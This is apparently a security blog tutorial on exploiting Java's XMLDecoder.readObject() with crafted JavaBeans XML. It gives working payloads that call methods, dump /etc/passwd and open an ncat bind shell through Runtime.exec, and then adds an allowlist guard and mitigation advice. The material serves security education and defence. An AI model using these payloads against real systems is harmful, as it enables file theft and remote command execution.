
Exploiting XMLDecoder's readObject() in ret2lib style by abusing JavaBeans persistence in XML.

This type of research is not new; it is rather old, and I found a few references about it (see the References section). I thought it would be useful to add a little more explanation and detail about this type of attack, as it is sparsely documented, and I had spent a considerable amount of time writing various kinds of exploits beyond those I found online.

Exploiting this feature is relatively easy but trickier than it looks, as you need to be creative in writing the exploit in XML style. You can stop here for a moment and have a closer look at the JavaBeans persistence XML schema and how it lets us reconstruct an object or call a method:

https://www.oracle.com/technical-resources/articles/java/persistence3.html

Now, why did I mention ret2lib style? In some binary exploitation challenges we try to reach a function of interest by redirecting execution to it; sometimes, by jumping to system() and passing our own argument, we can run system commands. Similarly, our attack vectors here are based on calling existing methods of the class that is currently being invoked, or methods of another class in a different package.

So here is the code under attack.

If we execute the code, this is the output generated in beaninxml.xml:

<?xml version="1.0" encoding="UTF-8"?>
<java version="1.8.0_265" class="java.beans.XMLDecoder">
 <object class="MyBean"/>
</java>


Now, with what we learned from reviewing the JavaBeans persistence XML schema, we will construct our payloads based on the above structure, which acts as a template for our attack vectors.

Case 1: Calling a member method of a class

We will try to call the method display1(), which is in the MyBean class. In our attacker-controlled XML file (exploit-base.txt), we add this code and execute it:

<?xml version="1.0" encoding="UTF-8"?>
<java version="1.8.0_265" class="java.beans.XMLDecoder">
 <object class="MyBean">
  <void method="display1" />
 </object>
</java>


Output

I am a simple print statement 
MyBean@5451c3a8

Case 2: Calling a member method of a class with primitive-type arguments

In this example we will try to call display2(String argument), which is in the MyBean class. In our attacker-controlled XML file (exploit-base.txt), we add this code and execute it. Here we pass an argument of type String to the method.

<?xml version="1.0" encoding="UTF-8"?>
<java version="1.8.0_265" class="java.beans.XMLDecoder">
 <object class="MyBean">
  <void method="display2">
   <string>I am passed via argument</string>
  </void>
 </object>
</java>


Output

I am passed via argument
MyBean@5451c3a8

Case 3: Calling a member method of a class with reference-type arguments

In this example we will try to call readFile(File fileName) in MyBean. In our attacker-controlled XML file (exploit-base.txt), we add this code and execute it. Here we abuse the readFile(File fileName) method to dump the contents of the /etc/passwd file; to do so we need to pass a File object to the method, which the schema lets us construct inline.

<?xml version="1.0" encoding="UTF-8"?>
<java version="1.8.0_265" class="java.beans.XMLDecoder">
 <object class="MyBean">
  <void method="readFile">
   <object class="java.io.File">
    <string>/etc/passwd</string>
   </object>
  </void>
 </object>
</java>

Output

<snip>
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
...
</snip>

Case 4: Calling a method of a class in a different package

In this example we will try to call java.lang.Runtime.getRuntime().exec(String cmd). In our attacker-controlled XML file (exploit-base.txt), we add this code and execute it. Here we try to get a bind shell on the victim's machine. Note that we are no longer using the object types from the base XML schema (the decoded object is not a MyBean at all). The attack still succeeds even though you encounter the error message below: the exception is raised when the type conversion (the cast to MyBean) happens, and the exploit has already been triggered by then.

<?xml version="1.0" encoding="UTF-8" ?>
<java version="1.4.0" class="java.beans.XMLDecoder">
 <object class="java.lang.Runtime" method="getRuntime">
  <void method="exec">
   <string>ncat -nlvp 3333 -e /bin/bash</string>
  </void>
 </object>
</java>


Output

Exception in thread "main" java.lang.ClassCastException: java.lang.Runtime cannot be cast to MyBean
	at DemoExample.fromXML(DemoExample.java:37)
	at DemoExample.main(DemoExample.java:12)


Then we go to a command prompt and connect to the listener:

nc 127.0.0.1 3333
id
uid=1000(websec) gid=1000(websec)  ... ... ...
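As an added defensive example (not the post's DemoExample code): before handing untrusted XML to XMLDecoder, parse it with a hardened DOM parser and reject any class or method attribute outside an allowlist, which stops the Case 3 and Case 4 payloads while still accepting Cases 1 and 2. The allowlist contents are an assumption based on the post's MyBean.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import java.util.Arrays;
import java.util.List;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.*;

// Added example, not the post's DemoExample: an allowlist check run before XMLDecoder.readObject().
// Assumption: the application only ever expects a MyBean whose display1/display2 may be called.
public final class XmlDecoderGuard {
    private static final List<String> ALLOWED_CLASSES = Arrays.asList("java.beans.XMLDecoder", "MyBean");
    private static final List<String> ALLOWED_METHODS = Arrays.asList("display1", "display2");

    /** True only if every element of the persistence XML stays inside the allowlist. */
    public static boolean isSafe(String xml) throws Exception {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true); // no DTD, no XXE
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        Document doc = f.newDocumentBuilder()
                .parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
        return check(doc.getDocumentElement());
    }

    private static boolean check(Element e) {
        NamedNodeMap attrs = e.getAttributes();
        for (int i = 0; i < attrs.getLength(); i++) {
            Node a = attrs.item(i);
            switch (a.getNodeName()) {
                case "version": break;                       // metadata on the <java> root
                case "class":  if (!ALLOWED_CLASSES.contains(a.getNodeValue())) return false; break;
                case "method": if (!ALLOWED_METHODS.contains(a.getNodeValue())) return false; break;
                default: return false;                       // property, field, idref, index: never expected
            }
        }
        NodeList kids = e.getChildNodes();                   // recurse: nested <object>/<void> count too
        for (int i = 0; i < kids.getLength(); i++) {
            Node k = kids.item(i);
            if (k.getNodeType() == Node.ELEMENT_NODE && !check((Element) k)) return false;
        }
        return true;
    }

    public static void main(String[] args) throws Exception {
        // Constructed samples: the post's Case 1 payload passes, a Case 3-shaped payload is rejected.
        String ok  = "<java version=\"1.8.0_265\" class=\"java.beans.XMLDecoder\">"
                + "<object class=\"MyBean\"><void method=\"display1\"/></object></java>";
        String bad = "<java version=\"1.8.0_265\" class=\"java.beans.XMLDecoder\"><object class=\"MyBean\">"
                + "<void method=\"readFile\"><object class=\"java.io.File\"><string>/etc/passwd</string></object></void></object></java>";
        System.out.println("case1 accepted=" + isSafe(ok) + ", file-read payload accepted=" + isSafe(bad));
    }
}
```

The more robust fix is to never hand attacker-controlled input to XMLDecoder at all, since its schema is effectively a general-purpose method-call language; a guard like this only narrows what an existing call can reach.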


Well, that's it. I learnt a lot of things while doing this, and I hope it will be useful to someone someday :)


References:
  • https://web.archive.org/web/20131016234737/http://blog.diniscruz.com/2013/08/using-xmldecoder-to-execute-server-side.html
  • https://stackoverflow.com/questions/14307442/is-it-safe-to-use-xmldecoder-to-read-document-files
  • https://github.com/o2platform/DefCon_RESTing/tree/c77474f2d063973c265f5b265af63fd3c5de44cc/Demos/XMLDecoderVuln/src/com/company
  • https://github.com/pwntester/XMLDecoder
